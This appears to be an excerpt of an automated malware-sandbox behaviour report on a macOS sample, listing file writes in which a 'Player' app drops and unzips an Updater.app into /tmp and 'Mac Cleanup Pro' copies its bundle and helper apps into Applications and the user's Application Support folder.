Uses Security framework containing interfaces for system-level user authentication and authorization

Show sources

Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)

Security framework info plist opened: /System/Library/Frameworks/Security.framework/Resources/Info.plist

Writes 64-bit Mach-O files to disk

Show sources

Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/MacOS/Updater	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	File written: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylib	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/Autoupdate	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/fileop	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Sparkle	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/MacOS/helpermcp	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/MacOS/mcpuninstall	Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	File written: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	File written: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/mcpupdater.app/Contents/MacOS/mcpupdater	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	File written: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/MacOS/mcpuninstall	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	File written: /Users/henry/Library/Application Support/mcp/mcpuninstall.app/Contents/Resources/mcpuninstallhelper.app/Contents/MacOS/mcpuninstallhelper	Jump to dropped file

Writes JavaScript files to disk

Show sources

Source: /bin/cp (PID: 806)	JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/DisableSelection.js	Jump to dropped file
Source: /bin/cp (PID: 806)	JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/DisableSelection.js	Jump to dropped file
Source: /bin/cp (PID: 806)	JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/jquery.min.js	Jump to dropped file
Source: /bin/cp (PID: 806)	JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/helpermcp.app/Contents/Resources/owl.carousel.min.js	Jump to dropped file
Source: /bin/cp (PID: 806)	JavaScript file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/jquery.min.js	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	JavaScript file created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/DisableSelection.js	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	JavaScript file created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/jquery.min.js	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	JavaScript file created: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/Resources/owl.carousel.min.js	Jump to dropped file

Writes Mach-O files to the tmp directory

Show sources

Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/MacOS/Updater	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	64-bit Mach-O written to tmp path: /private/tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylib	Jump to dropped file

Writes RTF files to disk

Show sources

Source: /bin/cp (PID: 806)

File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/credits.rtf

Jump to dropped file

Writes ZIP files to disk

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)

ZIP file created: /private/tmp/Updater.zip

Jump to dropped file

Writes icon files to disk

Show sources

Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/AppIcon.icns			Jump to dropped file
Source: /bin/cp (PID: 806)	File written: /Applications/Mac Cleanup Pro.app/Contents/Resources/application.icns			Jump to dropped file

Creates application bundles containing framework (and dylib) files

Show sources

Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftAppKit.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreImage.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftObjectiveC.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftXPC.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftSafariServices.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCore.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreGraphics.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftMetal.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreData.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftDispatch.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftos.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftCoreFoundation.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftDarwin.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftQuartzCore.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftIOKit.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Alamofire	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Resources	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/Current	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory file created: /tmp/ddd/Updater.app/Contents/Frameworks/libswiftFoundation.dylib	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory symbolic link created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Alamofire -> Versions/Current/Alamofire	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory symbolic link created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Resources -> Versions/Current/Resources	Jump to behavior
Source: /usr/bin/unzip (PID: 776)	Framework directory symbolic link created: /tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/Current -> A	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/Autoupdate	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/fileop	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/PkgInfo	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/AppIcon.icns	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nb.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ca.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fi.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
